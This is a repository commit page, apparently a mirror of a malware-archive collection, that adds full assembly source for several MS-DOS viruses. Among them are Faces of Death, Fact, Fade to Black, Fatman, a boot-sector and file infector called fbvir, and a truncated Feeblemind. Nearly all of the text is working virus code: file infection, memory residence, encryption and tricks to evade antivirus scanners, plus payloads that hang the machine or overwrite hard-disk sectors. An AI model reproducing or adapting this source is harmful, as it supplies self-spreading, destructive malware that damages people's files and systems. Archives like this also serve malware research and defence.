daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 23:39:23 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/F-Index/Virus.MSDOS.Unknown.faces.asm
+246
View File
@@ -0,0 +1,246 @@
; ------------------------------------------------------------------------------
;
; - Faces of Death -
; Created by Immortal Riot's destructive development team
; (c) 1994 The Unforgiven/Immortal Riot
;
; ------------------------------------------------------------------------------
; þ Undetectable COM-infector(s) with a neat pay-load system! þ
; ------------------------------------------------------------------------------
.model tiny
.radix 16
.code
org 100h
start:
first_gen_buffer db 00,00,00,00 ; for first generation only!
v_start:
entry_point:
mov sp,102h ; get the delta offset so tbscan cant
call get_delta ; flag it as flexible entry point
get_delta:
mov bp,word ptr ds:[100h]
mov sp,0fffeh
sub bp,offset get_delta
mov ax,0305h ; this code was included to avoid detection
xor bx,bx ; from tbscan. The vsafe disabeling code can
int 16h ; be used as well, but f-prot heuristics
; complains about it.
call en_de_crypt ; decrypt the virus
jmp short real_start ; and continue...
encrypt_value dw 0 ; random xor (encryption) value
write_virus:
call en_de_crypt ; write encrypted copy of the virus
mov ah,40 ;
mov cx,code_end-v_start ; # bytes
lea dx,[bp+v_start] ; dx:100h
int 21 ;
call en_de_crypt ; decrypt virus again for further processing
ret
en_de_crypt:
mov ax,word ptr [bp+encrypt_value]
lea si,[bp+real_start]
mov cx,(enc_end-real_start+1)/2
xor_loopie:
xor word ptr [si],ax ; encrypts two bytes/loop until all
inc si ; code between real_start and enc_end
inc si ; are encrypted
loop xor_loopie
ret
real_start:
cmp word ptr cs:[5dh],'?-' ; check for -? in the command line
jne chk_cond ; no valid virus option!
mov ah,9 ; tell them that i wrote the virus,
lea dx,[bp+offset v_name] ; and quit without infecting!
int 21h
int 20h
chk_cond:
mov ah,2ch ; get time of 1/100 of a second value from
int 21h ; the system clock
cmp dl,58 ; value == 58h (88d)
jne get_drive ; nope!
cr_file: ; value = 58h
mov ah,3ch ; create the file c:\dos\keyb.com
mov cx,0 ; Doh! One byte wasted!
lea dx,[bp+file_create]
int 21h
xchg ax,bx
mov ah,40h ; write the
mov cx,len ; 80hex virus,
lea dx,[bp+write] ; from this virus
int 21h ; to keyb.com
mov ah,3eh ; close file
lea dx,[bp+offset file_create] ; c:\dos\keyb.com
int 21h
jmp $ ; and hang
get_drive:
mov ah,19h ; get drive from where we are executed from
int 21h ; check if it's a: or b:
cmp al,2 ; if so, return control to the original
jb quit ; program without infecting other files
lea si,[bp+org_buf] ; copy the first four bytes of the file
mov di,100 ; (from di:100h) to org_buf
movsw ;
movsw ;
lea dx,[bp+code_end] ; set our own dta to code_end, so
call set_dta ; the paramters when findfiles arent
; destroyed
lea dx,[bp+direct_infect] ; if present, infect
call dirinfect ; \dos\edit.com
mov ah,4e ; search for com files
lea dx,[bp+com_files] ;
find_next:
int 21
jc no_more_files ; no more files find, exit!
call infect ; found a find, infect it!
mov ah,4f ; search next file
jmp short find_next ; and see if we find one
no_more_files: ;
mov dx,80 ; set the dta to 80h (default)
call set_dta ;
quit: ;
mov di,100 ; return control to original program
push di ;
ret
infect:
lea dx,[bp+code_end+1e] ; 1e = adress to filename in ds:dx in our
; new dta area!
dirinfect:
mov ax,3d02 ; open file
int 21 ; in read/write mode
jnc infect_it ; if the file \dos\edit.com doesnt exist
ret ; return, and search first comfile
infect_it:
xchg bx,ax ; filehandle in bx
mov ax,5700 ; get time/date
int 21
push dx ; save date
push cx ; save time
mov ah,3f ; read the first four bytes
mov cx,4 ; of the file to org_buf
lea dx,[bp+org_buf]
int 21
cmp byte ptr [bp+org_buf+3],07h ; previous infected
jz finish_infect ;
cmp word ptr [bp+org_buf],9090h ; double nop
jz finish_infect ;
cmp word ptr [bp+org_buf],5a4dh ; ZM (exe file)
jz finish_infect ;
cmp word ptr [bp+org_buf],4d5ah ; MZ (exe-file)
jz finish_infect ;
cmp byte ptr [bp+org_buf+1],6Dh ; command.com
jz finish_infect ;
mov ax, word ptr [bp+code_end+1ah] ; <1000 bytes
cmp ax,1000d ;
jb finish_infect
cmp ax,64000d ; >64000 bytes
ja finish_infect ;
mov ax,4202 ; move file-pointer
xor cx,cx ; to end of file
cwd
int 21
sub ax,3 ; substract bytes
mov word ptr [bp+first_four+1],ax ; to our own jump
get_value:
mov ah,2ch ; get system clock for
int 21h ; 1/100 of a second
jz get_value ; if zero = get new value
add ax,3 ; this will be used for
mov word ptr [bp+encrypt_value],dx ; the xor-value
call write_virus ; write virus to end of file
mov ax,4200 ; move file-pointer to
xor cx,cx ; top of file
cwd
int 21
mov ah,40 ; write our own jump
mov cx,4 ; instruction to the
lea dx,[bp+first_four] ; beginning
int 21
finish_infect:
mov ax,5701 ; set back
pop cx ; time
pop dx ; date
int 21 ;
mov ah,3e ; close file
int 21
ret ; return and continue!
set_dta:
mov ah,1a ; code to set the disk transfer area
int 21 ;
ret
v_name db "Faces of Death - (c) 1994 The Unforgiven/Immortal Riot$"
direct_infect db '\DOS\EDIT.COM',0
file_create db 'c:\dos\keyb.com',0
write db "þJÄNºJÍ!s´,Í!úOr°¹
endwrite:
len equ endwrite-write
com_files db '*.com',0
first_four db 0e9,90,90,07 ; buffer to calculate the new entry
org_buf db 90,90,0CDh,20 ; buffer to save the first four bytes
enc_end:
code_end:
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.fact.asm
+37
View File
@@ -0,0 +1,37 @@
Fact is a 45 bytes overwriting resident COM/EXE infector. Infects files at
load and/or execute program by overwriting the infected file.
Compile Fact with Turbo Assembler v 4.0 by typing:
TASM /M FACT.ASM
TLINK /t /x FACT.OBJ
.model tiny
.code
org 100h
code_begin:
mov ax,3521h ; Get interrupt vector 21h
int 21h
mov word ptr [int21_addr],bx
mov word ptr [Int21_addr+02h],es
mov ah,25h ; Set interrupt vector 21h
lea dx,int21_virus ; DX = offset of int21_virus
int 21h
xchg ax,dx ; DX = number of bytes to keep res...
int 27h ; Terminate and stay resident!
int21_virus proc near ; Interrupt 21h of Fact
cmp ah,4bh ; Load and/or execute program?
jne int21_exit ; Not equal? Jump to int21_exit
mov ax,3d01h ; Open file (write)
int 21h
xchg ax,bx ; BX = file handle
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,40h ; Write to file
mov cx,(code_end-code_begin)
lea dx,code_begin ; DX = offset of code_begin
int21_exit:
db 0eah ; JMP imm32 (opcode 0eah)
code_end:
int21_addr dd ? ; Address of interrupt 21h
virus_name db '[Fact]' ; Name of the virus
endp
end code_begin
MSDOS/F-Index/Virus.MSDOS.Unknown.fade.asm
+343
View File
@@ -0,0 +1,343 @@
; VirusName: Fade to Black
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 07-29-1993
;
; This is a mutation of Creeping Tormentor, whick was discovered
; in Feb 1992. The origin is "unknown" (attention Patricica), it's
; written in Sweden by Tormentor / Demoralized Youth
; Many thanx goes to Tormentor for the original code.
;
; This is a Parasite, Resident, Appending COM-files infector.
; Searches for the string sUMsDos (?) in memory.
; search for Jerusalen, and if it's locate it, crash the HD.
;
; This will just fine, and
; McAfee Scan v105 can't find it, and
; S&S Toolkit 6.5 don't find it either.
;
; I haven't tried with scanners like Fprot/Tbscan,
; but they will probably report some virus structure.
;
; Best Regards : [Metal Militia]
; [The Unforgiven]
code segment byte public
assume cs:code, ds:code, es:code, ss:code
org 100h
codebeg:
mov ax,0700h ; Remove virus from code!
int 21h ;^-- Scan string (before it was ax,043FFh)
; Let's allocate some mem!
mov ax,ds
sub ax,11h
mov ds,ax
cmp byte ptr ds:[0100h],5Ah
jnz skip
mov ax,ds:[0103h]
sub ax,40h
jb skip
mov ds:[0103h],ax
sub word ptr ds:[0112h],50h
mov es,ds:[0112h]
push cs
pop ds
mov cx,code_end-codebeg
mov di,100h
push di
mov si,di
rep movsb
push es
pop ds
mov ax,351Ch
int 21h
mov word ptr ds:[int1Cret],bx
mov word ptr ds:[int1Cret+2],es
mov al,21h
int 21h
mov word ptr ds:[real21+1],bx
mov word ptr ds:[real21+3],es
mov ah,25h
mov dx,offset int21beg
int 21h
mov al,1Ch
mov dx,offset int1Cnew
int 21h
push cs
push cs
pop es
pop ds
ret
skip: int 20h
int21beg: push ax
sub ax,4B00h
jz infect
pop ax
cmp ax,0700h ; Check if ....
jne real21
mov ax,word ptr ds:[retdata]
mov si,ax
mov di,100h
mov cx,code_end-codebeg
rep movsb
mov ax,100h
pop cx
pop cx
push es
push ax
iret
real21: db 0EAh, 00h, 00h, 00h, 00h ; Jump to org21vec.
retdata: db 00h, 00h
f_time: dw 0000h
f_date: dw 0000h
infect: pop ax
push ax
push bx
push cx
push di
push ds
push dx
push si
mov ah,43h ; Get file attr.
int 21h
mov ax,4301h
and cx,0FEh ; Strip the Read-only-flag
int 21h
mov ax,3D02h ; Open victim.
int 21h
xchg ax,bx
call sub_2
sub_2: mov di,sp ; God what I hate that Eskimo!
mov si,ss:[di]
inc sp
inc sp
push cs
pop ds
mov ax,5700h ; Get file's time and date
int 21h
mov [si-(sub_2-f_time)],cx
mov [si-(sub_2-f_date)],dx ; And save them...
mov ah,3Fh ; Read X byte from begin.
mov cx,code_end-codebeg
add si,code_end-sub_2 ; SI points to EOF
mov dx,si
int 21h
cmp word ptr [si],'MZ' ; Mark Zimbowski? (EXE?)
je close
cmp word ptr [si],'ZM' ; Zimbowski Mark? (EXE?)
je close
mark: cmp word ptr [si+(mark-codebeg+4)],'½¾' ; infected?
je close
call put_eof ; move file ptr to EOF
cmp ax,(0FFFFh-(code_end-codebeg)-100h)
ja close
cmp ax,code_end-codebeg+100h
jb close
add ax,100h
mov word ptr ds:[si-(code_end-retdata)],ax
mov ah,40h ; Flytta (move) beg to end.
mov cx,code_end-codebeg
mov dx,si
int 21h
mov ax,4200h ; fptr to filbeg.
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ; Write virus to beg.
mov cx,code_end-codebeg
mov dx,si
sub dx,cx
int 21h
close: mov ax,5701h
mov cx,[si-(code_end-f_time)]
mov dx,[si-(code_end-f_date)]
int 21h
mov ah,3Eh
int 21h ; close file, bx=file handle
pop si
pop dx
pop ds
pop di
pop cx
pop bx
pop ax
jmp real21
put_eof: mov ax,4202h
xor dx,dx
xor cx,cx
int 21h
ret
int1Cnew:
push ax
inc byte ptr cs:[counter]
mov al,30h
cmp byte ptr cs:[counter],al
jz scan
pop ax
quit: jmp dword ptr cs:[int1Cret]
scan:
push bx
push cx
push di
push ds
push dx
push es
push si
push cs
pop ds
cld
xor bx,bx
mov byte ptr cs:[counter],bh
mov cx,0FA0h
mov ax,0b800h
mov es,ax
xor di,di
again: mov al,byte ptr cs:[text+bx]
sub al,80h
repnz scasb
jnz stick
maybe: inc di
inc bx
cmp bx,10d
jz beep
mov al,byte ptr cs:[text+bx]
sub al,80h
scasb
jz maybe
xor bx,bx
jmp again
beep:
xor cx,cx
mov bx,word ptr cs:[int1Cret]
mov es,word ptr cs:[int1Cret+2]
mov ax,251Ch
int 21h
overagain: mov dx,0180h
xor bx,bx
reset: mov ah,00h
inc bx
cmp bl,5h
jz raise
inc cx
int 13h
hoho: mov ax,0380h
inc cx
int 13h
jc reset
jmp hoho
raise: xor cx,cx
xor bx,bx
inc dx
cmp dl,85h
jnz hoho
jmp overagain
stick:
pop si
pop es
pop dx
pop ds
pop di
pop cx
pop bx
pop ax
jmp quit
counter: db 00h
text: db 's'+80h, 'U'+80h, 'M'+80h, 's'+80h, 'D'+80h, 'o'+80h
db 's'+80h
; This is what it scans the screen for --^ sUMsDos
; just a little bit cryptic eh ?
int1Cret: db 0EAh, 00h, 00h, 00h, 00h
code_end: ; THE END.
; This isn't really a bullshit note, this is a Metallica Note ;)
; which means quality! Metal Up Your Ass!
bullshit_note db "Metal Militia / Immortal Riot "
DB "Fade To Black "
DB "Things not what they used to be "
DB "Missing one inside of me "
DB "Deathly lost, this can't be real "
DB "Cannot stand this hell I feel... "
code ends
end codebeg
; Think that would be it..

MSDOS/F-Index/Virus.MSDOS.Unknown.fatman.asm
+81
View File
@@ -0,0 +1,81 @@
code segment'code'
assume cs:code, ds:code, ss:code, es:code
org 100h
dta equ endcode + 10
fatmanid equ 34
start:
jmp virus
hoststart:
db 90h,90h,90h ;NOP
db 0cdh,020h,1ah,1ah ;INT 20
hostend:
virus:
call $ + 2
fatman:
pop bp ;Search for next files
sub bp,offset fatman
mov ah,1ah
lea dx,[bp +dta]
int 21h
mov ah,4eh
lea dx,[bp + filespec]
xor cx,cx
fileloop:
int 21h
jc quit
mov ax,3d02h ;Open file read and write
lea dx,[bp + offset dta + 30] ;Move the offset of filename
int 21h ;into dx register
jc quit
xchg bx,ax
mov ah,3fh ;read from file
mov cx,4 ;read 4 bytes off file
lea dx,[bp + orgjmp] ;store the 4 bytes
int 21h
mov ax,4202h ;point to end of file
xor cx,cx
xor dx,dx
int 21h
sub ax,03h ;Back three bytes from org
mov [bp + newjmp + 2], ah ;high location
mov [bp + newjmp + 1], al ;low location
mov [bp + newjmp + 3], fatmanid;his ID
mov ah,0e9h ;JMP
mov [bp + newjmp],ah
mov ah,40h ;write to file
mov cx,endcode - virus
lea dx,[bp + virus]
jc quit
mov ax,4200h ;Moving to TOP of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;writing 4 bytes to top of file
mov cx,4
lea dx,[bp + offset newjmp]
int 21h
mov ah,1ah
mov dx,080h
int 21h
quit:
lea si,[bp + offset thisjmp]
mov di,0100h
mov cx,04h
cld
rep movsb
mov di,0100h
jmp di
filespec db '*.COM',0
orgjmp db 4 dup (?)
newjmp db 4 dup (?)
thisjmp db 4 dup (?)
oldjmp db 09h,0cdh,020h,90h
endcode:
code ends
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.fbvir.asm
+577
View File
@@ -0,0 +1,577 @@
;
; ÜÜ Û
; ßßß Virus Magazine Û Box 176, Kiev 210, Ukraine IV 1997
; ßÛÛ ßßßßßßßßßßßßßßßß Û ßßßßßßßßßßßßßßßßßßß ß ßßßßÞßßß ÛßßßßßßÛ
; ÞÛ ÛßÜ Ûßß Üßß Üßß ÜÛÜ Üßß ÛßÛ Ý Û ÜßÛ Û Üßß ÛÜÜ Û Û Û Û
; Û Û Û Ûß Ûß Û Û Ûß Û Û Û Û Û Û Û Û Û Û Û Û Û
; Û Þ Þ Þ ÞÜÜ ÞÜÜ Þ ÞÜÜ ÞÜß ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜÜ Û Û Û Û
; Þ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÛÜÜÜÜÜÜÛ
; (C) Copyright, 1994-97, by STEALTH group WorldWide, unLtd.
;
;-------------------------------------------------------------------------
; MCE-Len*512
; ‚¨àãá § à ¦ ¥â COM ¨ EXE ä ©«ë ¯à¨ ¨å ᮧ¤ ­¨¨
; (â®ç­¥¥ ¯à¨ § ªàë⨨ ­®¢®á®§¤ ­­®£® ä ©« ).
; ’ ª¦¥ § à ¦ ¥âáï § £à㧮ç­ë© ᥪâ®à ¯¥à¢®£® «®£¨ç¥áª®£® ¤¨áª  ­  ¯¥à¢®¬
; HD. (ï à¥è¨« ­¥ ®¯à¥¤¥«ïâì ¤¥©á⢨⥫ì­ë© á¨á⥬­ë© ¤¨áª - «¥­ì
; ¢®§¨âìáï!!!)
; ‚ ¯ ¬ïâì ¨­áâ «¨à㥬áï ’Ž‹œŠŽ ¯à¨ ¯¥à¥§ £à㧪¥ ¬ è¨­ë.
; ਠ§ ¯ã᪥ ¯à®£à ¬¬ë ä-樥© 4B00h ¢¨àãá «¥ç¨â § £à㧮ç­ë© ᥪâ®à.
; ਠ¨á¯®«­¥­¨¨ ä-樨 4Cxxh § £à㧮ç­ë© ᥪâ®à § à ¦ ¥âáï á­®¢ !!!
;
; „ ­­ë© ⥪áâ ­¥ ¯à®å®¤¨« ®¯â¨¬¨§ æ¨î...Sorry.
;-------------------------------------------------------------------------
.model tiny
.code
;-------------------------------------------------------------------------
len equ 4 ; Len virus in sectors (include boot part)
;////////////////////////////////////////////////////
; Start BOOT part (installer for Dos part...)
org 0
;////////////////////////////////////////////////////
BootStart:
jmp BootCode
;--------------------------------------------------------------
BootData db 40h dup (0) ; Data for boot sector.
;--------------------------------------------------------------
BEEP:
push ax
mov ax,0e07h
int 10h
pop ax
ret
BootCode:
nop
nop
cli
xor di,di
mov si,7C00h
mov bx,si
mov ds,di
mov ss,di
mov sp,si
sti
;
int 12h
sub ax,96 ; - 96 kb.
mov cl,6
shl ax,cl
mov es,ax ; ES = segment for our body
;
cld
mov cx,512
rep movsb ; Transmit body
;
push ax
mov ax,offset BootInstall
push ax
retf
;-------------------------------------------------------------
BootInstall:
mov si,1Ch*4
push si
lea di,OldTimerAddr
movsw
movsw
;
cli
pop di
mov word ptr ds:[di],offset TimerManager
mov word ptr ds:[di+2],es
sti
;
push ds
pop es
mov ax,0201h
mov cx,0009
mov dx,0080h
push es
push bx
int 13h
retf
;-------------------------------------------------------------
OldTimerAddr dw 0,0
;-------------------------------------------------------------
TimerManager:
push ds es ax bx di si
;
xor ax,ax
mov es,ax
mov ds,ax
;
mov ax,ds:[(21h*4)+2]
cmp ah,08
ja ExitTimer
mov cs:Seg21h,ax
mov ax,ds:[21h*4]
mov cs:Ofs21h,ax
;
mov word ptr ds:[21h*4],offset InstallDosManager
mov ds:[(21h*4)+2],cs
;
push cs
pop ds
lea si,OldTimerAddr
mov di,1Ch*4
cld
movsw ; Return old timer procedure
movsw
ExitTimer:
pop si di bx ax es ds
iret
;-------------------------------------------------------------
InstallDosManager:
cmp ax,4B00h
jz FullInstall
;
OldDosManager:
db 0EAh
Ofs21h dw 0
Seg21h dw 0
;
;---------------------------------------------------
i21h:
pushf
call dword ptr cs:[offset Ofs21h]
ret
;---------------------------------------------------
FullInstall:
push ax bx cx dx si di es ds
;
push cs
pop ds
;
mov ah,48h
mov bx,4096/16
int 21h ; AX = Segment of new area for virus
jc NoInstalled
;
mov es,ax
xor si,si
mov di,si
;
cld
mov cx,512
mov bx,cx
rep movsb
;
dec ax
mov ds,ax
mov word ptr ds:[01],0070h ; MSDOS segment
;
mov ds,cx
;
mov ax,0204h ; Read 4 sectors (2 kb)
mov cx,0010 ; (virus body - without current part)
mov dx,0080h
int 13h
;
mov word ptr ds:[21h*4],offset VirusDosManager
mov ds:[(21h*4)+2],es
;
call BEEP ;*****************************<<<<<<<<<<
;
NoInstalled:
pop ds es di si dx cx bx ax
jmp OldDosManager
;-------------------------------------------------------------
org 510
db 55h,0AAh ; 'Uª'
;-------------------------------------------------------------
;/////////////////////////////////////////////////////////////
; Start Dos TSR file infector.
org 512
;/////////////////////////////////////////////////////////////
VirusDosManager:
cmp ax,0FFAAh ; Our copy call us
jnz LookNextFun
stc ; CY=1
retf 2
LookNextFun:
cmp ah,4Ch
jnz LookRunFun
jmp ExitProg
LookRunFun:
cmp ax,4B00h
jnz LookCREATE
jmp RunProg
LookCREATE:
cmp cs:Fhandle,0 ; <>0 then file processed!!!
jnz LookCloseOurFile
;
cmp ah,3Ch ; Create
jz OurFun
cmp ah,5Bh ; Create
jz OurFun
ExitVDM:
jmp OldDosManager
;-----------------------------------------------------
LookCloseOurFile:
cmp ah,3Eh ; Close
jnz ExitVDM
cmp cs:Fhandle,bx
jnz ExitVDM
jmp InfectClosedFile
;-----------------------------------------------------
OurFun:
push ax si
;
cld
mov si,dx
LookNULL:
lodsb
cmp al,'.'
jnz LookNULL
lodsw
;
or ax,2020h ; ' '
cmp ax,'xe' ; EXe
jnz LookCOM
lodsb
or al,20h
cmp al,'e' ; exE
jnz NoOurEXT
mov Ftype,1
jmp GetHandle
LookCOM:
cmp ax,'oc' ; COm
jnz NoOurEXT
lodsb
or al,20h
cmp al,'m' ; coM
jnz NoOurEXT
mov Ftype,2
GetHandle:
mov si,dx
push bp
mov bp,dx
LookTild:
lodsb
cmp al,0
jz LookFileName
cmp al,'\'
jnz LookTild
mov bp,si
jmp LookTild
LookFileName:
mov si,bp
pop bp
lodsw
or ax,2020h
cmp ax,'rd' ; DRweb
jz NoOurEXT
cmp ax,'ia' ; AIdstest
jz NoOurEXT
cmp ax,'da' ; ADinf
jz NoOurEXT
cmp ax,'sm' ; MScan
jz NoOurEXT
;
pop si ax
call i21h ; int 21h
mov cs:Fhandle,ax
jnc e1
mov cs:Fhandle,0
e1:
retf 2
NoOurEXT:
pop si ax
jmp ExitVDM
;---------------------------------------------------------
bootCX dw 0
bootDX dw 0
;---------------------------------------------------------
InfectClosedFile:
push ax bx cx dx es ds si di bp
;
push cs
pop ds
call InfectFile
;
pop bp di si ds es dx cx bx ax
;
jmp OldDosManager
;---------------------------------------------------------
;/////////////////////////////////////////////////////////
;---------------------------------------------------------
FileInstaller:
call $+3
pop bp
sub bp,03
mov ax,0FFAAh
int 21h
jc ExitFileInstall
cmp al,0
jnz ExitFileInstall
push es ds
call InstallVirus_to_PC
pop ds es
ExitFileInstall:
cmp word ptr cs:[bp][offset OriginBytes-offset FileInstaller],'ZM'
jz L_exe
;-Loaded from com file.-------------------------------------------
mov di,100h
lea si,[bp][offset OriginBytes-offset FileInstaller]
push di
movsw
movsw
movsb
ret ; Go to infected com program.
;----------------------------
OriginBytes Label Byte
mov ax,4c00h
int 21h
db 20h dup (90h)
;----------------------------
;-Loaded from exe file.--------------------------------------------
L_exe:
mov ax,es
add ax,10h
push ax
add cs:[bp][offset CS_file-offset FileInstaller],ax
pop ax
SS_file: add ax,0000
cli
mov ss,ax
SP_file: mov sp,0000
sti
db 0eah
IP_file dw ?
CS_file dw ?
;-------------------------------------------------------------------
InstallVirus_to_PC:
push cs
pop ds
mov ax,0B900h ; 3 page of videobuffer
mov es,ax
xor bx,bx
;
mov ax,0201h ; READ MBR
mov cx,1
mov dx,80h
int 13h ; ES:BX = B900:0000h
;
jnc ReadOk
OurBoot:
ret
ReadOk:
; cmp byte ptr es:[bx+01BEh],80h ; Bootable disk ?
mov cx,es:[bx+01C0h] ; sect,cyl
mov dh,es:[bx+01BFh] ; head
;
mov ds:[bp][(offset FIend-offset FileInstaller)+offset bootCX],cx
mov ds:[bp][(offset FIend-offset FileInstaller)+offset bootDX],dx
;
mov ax,0201h ; READ BOOT on drive C:\
int 13h
cmp word ptr es:[bx+offset BootCode],9090h
jz OurBoot ; Already infected!!!
;
push cx dx
;
mov ax,0301h ; WRITE OLD BOOT to unuseble section
mov dx,80h
mov cx,9
int 13h
;
push es ds
pop es ds
cld
mov si,offset BootData
lea di,[bp+si][offset FIend-offset FileInstaller]
mov cx,40h
rep movsb ; Copy origin Boot Data to Virus Boot Data
;
push cs
pop ds
lea bx,[bp][offset FIend-offset FileInstaller+512]
;
mov ax,0304h ; WRITE VIRUS BODY
mov cx,10
int 13h
;
sub bx,512
mov ax,0301h ; WRITE VIRUS BOOT SECTOR in system area
pop dx cx
int 13h
ret
;---------------------------------------------------------
FIend label byte
;---------------------------------------------------------
;/////////////////////////////////////////////////////////
;---------------------------------------------------------
; ENTER : BX = File Handle
; EXIT : File not CLOSED!!! , Fhandle = 0
InfectFile:
call diskryptor
mov ah,3fh
mov cx,18h
mov dx,offset OriginBytes
mov si,dx
int 21h
jc _1
cmp word ptr ds:[offset OriginBytes],'ZM'
jz _EXE
cmp word ptr ds:[offset OriginBytes+3],'::'
jz _1
;-Infect .COM --------------------------------
cmp bp,(65500-(512*Len))
ja _1 ;„«¨­  ¡®«ìè¥ ¤®¯ãá⨬®©.
mov es:[di+21],bp ;F.p. = end file.
;-Make JMP------------------------------------
sub bp,03
mov ds:[offset jmp_n],bp
call WriteBody
jc _1b
mov cx,05h
mov dx,offset new_3_byte
ExitWrite:
mov ah,40h
int 21h
_1b: jmp exit_date
_1: ret
;-Infect .EXE ---------------------------------
_EXE:
cmp ds:[si+12h],'::' ; Already infected ?
jz _1 ; Yes!
mov ax,ds:[si+4] ; Pages (512b).
dec ax
mov cx,512
mul cx
add ax,[si+2] ; DX:AX = File len from header.
cmp ax,bp ; Real file len = dx:ax ?
jnz _1 ; No - this is overlay.
cmp es:[di+19],dx ; ********************
jnz _1 ; No - this is overlay.
;-----
mov es:[di+21],ax ; F.p.= end file.
mov es:[di+23],dx
;-Get header.-----------------------------------
mov [si+12h],'::'
mov ax,[si+14h]
mov ds:[offset IP_file],ax
mov ax,[si+16h]
mov ds:[offset CS_file],ax
mov ax,[si+10h]
mov word ptr ds:[offset SP_file+1],ax
mov ax,[si+0eh]
mov word ptr ds:[offset SS_file+1],ax
;-----------------------------------------------
xchg ax,bp
mov cx,10h
div cx
sub ax,[si+8]
sbb dx,0
mov [si+16h],ax ; ReloCS.
mov [si+0eh],ax ; ReloSS
mov [si+14h],dx ; ExeIP.
mov [si+10h],4096 ; ExeSP
;-Correcting file len in header.----------------
add word ptr [si+4],len ; Newlen=OldLen+(512*len)
;-Write virus in file.--------------------------
call WriteBody
jc exit_date
;-Write new header.-----------------------------
mov cx,18h
mov ah,40h
mov dx,offset OriginBytes
int 21h
exit_date:
mov ax,5701h
mov cx,es:[di+13]
mov dx,es:[di+15]
int 21h
ret
;----------------------------------------------
WriteBody proc
mov Fhandle,0
mov dx,offset FileInstaller
mov cx,(offset FIend - offset FileInstaller)
mov ah,40h
int 21h
xor dx,dx
mov cx,512*len
mov ah,40h
int 21h
mov es:[di+21],dx ; F.p.= start file.
mov es:[di+23],dx ;
ret
WriteBody endp
;----------------------------------------------
diskryptor proc
mov ax,1220h
push bx
int 2fh
mov bl,es:[di]
mov ax,1216h
int 2fh
pop bx
mov byte ptr es:[di+2],02 ; mode = r/w.
xor dx,dx
mov es:[di+21],dx ; F.p.= end file.
mov es:[di+23],dx ; F.p.= end file.
mov bp,es:[di+17]
ret
diskryptor endp
;-----------------------------------------------
Ftype db 0 ; 1 - EXE ; 2 - COM
Fhandle dw 0 ; Handle of this file or 0000 for NoFile
;-----------------------------------------------
new_3_byte db 0e9h
jmp_n dw 0000
db '::'
;---------------------------------------------------------
ExitProg:
push ax bx cx dx es cs
pop es
;
mov ax,0301h
mov cx,cs:bootCX
mov dx,cs:bootDX
xor bx,bx
int 13h
;
pop es dx cx bx ax
jmp ExitVDM
;---------------------------------------------------------
RunProg:
push ax bx cx dx es cs
pop es
;
mov ax,0201h ; READ ORIGIN BOOT
mov cx,0009
mov dx,0080h
lea bx,Buffer
int 13h
;
mov ax,0301h ; WRITE ORIGIN BOOT TO ¥£® ORIGIN PLACE
mov cx,cs:bootCX
mov dx,cs:bootDX
int 13h
;
pop es dx cx bx ax
jmp ExitVDM
;---------------------------------------------------------
;/////////////////////////////////////////////////////////
;---------------------------------------------------------
db '(c) Light General.Kiev.KIUCA.1996.NOT for free use.',0
db '(®¡ª ï ¯®¯ë⪠ ®¯ãáâ¨âì €¤¨­ä...€¤®«ìä...‰®á¨ä...ƒ“‹€ƒ...A€aa )',0
;---------------------------------------------------------
Header db 20h dup (?)
Buffer db 512 dup (?)
;----------------------------------------------------------------------
Virus1stInstaller:
mov ax,offset FIend-offset FileInstaller
xor bp,bp
sub bp,ax
call InstallVirus_to_PC
mov ax,4c00h
int 21h
;-----------------------------------------------------------------------
.stack 1024
end Virus1stInstaller
MSDOS/F-Index/Virus.MSDOS.Unknown.fbvir.map
+9
View File
@@ -0,0 +1,9 @@
Start Stop Length Name Class
00000H 007B4H 007B5H _TEXT CODE
007B6H 007B6H 00000H _DATA DATA
007C0H 00BBFH 00400H STACK STACK
Program entry point at 0000:07A6
MSDOS/F-Index/Virus.MSDOS.Unknown.feeble.a86
+120
View File
@@ -0,0 +1,120 @@
;
; Feeblemind
;
Start: Jmp Install
Old21 Dd 0
Org21 Dd 0
Inc10: Add Ah,10h
Eoi: Jmp Dword Ptr Cs:[Org21]
New21: Sub Ah,10h
Cmp Ax,3b00h
Jne Inc10
Push Ax
Push Bx
Push Cx
Push Dx
Push Ds
Push Es
Push Si
Push Di
Mov Ax,3d02h
Pushf
Call Dword ptr Cs:[Old21]
Xchg Ax,Bx
Mov Ah,30h
Add Ah,10h
Mov Cx,VLen
Lea Dx,Start
Mov Ds,Cs
Pushf
Call Dword ptr Cs:[Old21]
Mov Ah,3eh
Pushf
Call Dword Ptr Cs:[old21]
Pop Di
Pop Si
Pop Es
Pop Ds
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Jmp EOI
Db '[Feeblemind]'
Install: Mov Ax,3501h
Int 21h
Mov Word Ptr Cs:[Old1],Bx
Mov Word Ptr Cs:[Old1][2],Es
Mov Ax,2501h
Mov Ds,Cs
Lea Dx,New1
Int 21h
Cli
Pushf
Pop Ax
Or Ah,1
Push Ax
Popf
Sti
Mov Ah,30h
Int 21h
Cli
Pushf
Pop Ax
And Ah,0feh
Push Ax
Popf
Sti
Mov Ds,Word ptr Cs:[Old1][2]
Mov Dx,Word ptr Cs:[Old1]
Mov Ax,2501h
Int 21h
Mov Ax,1521h
Add Ah,20h
Int 21h
Mov Word Ptr Cs:[Org21],Bx
Mov Word Ptr Cs:[Org21][2],Es
Mov Ax,1521h
Add Ah,10h
Mov Ds,Cs
Lea Dx,New21
Int 21h
Lea Dx,EndByte
Int 27h
Old1 Dd 0
New1: Push Bp
Mov Bp,Sp
Cmp Word Ptr Ss:[Bp][4],116h
Jne Einde
Push Ax
Mov Ax,Ss:[Bp][4]
Mov Word Ptr Cs:[Old21][2],Ax
Mov Ax,Ss:[Bp][2]
